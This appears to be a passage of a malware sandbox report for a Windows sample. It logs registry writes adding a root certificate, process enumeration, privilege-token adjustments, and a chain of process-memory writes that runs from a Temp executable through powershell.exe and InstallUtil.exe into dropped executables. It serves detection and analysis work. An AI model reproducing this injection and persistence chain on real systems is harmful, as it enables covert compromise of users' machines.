e5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
N/A N/A C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 228 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 932 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe
PID 932 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe
PID 932 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe
PID 932 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe
PID 932 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe
PID 932 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe
PID 932 wrote to memory of 3080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe
PID 932 wrote to memory of 3080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe
PID 932 wrote to memory of 3080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe
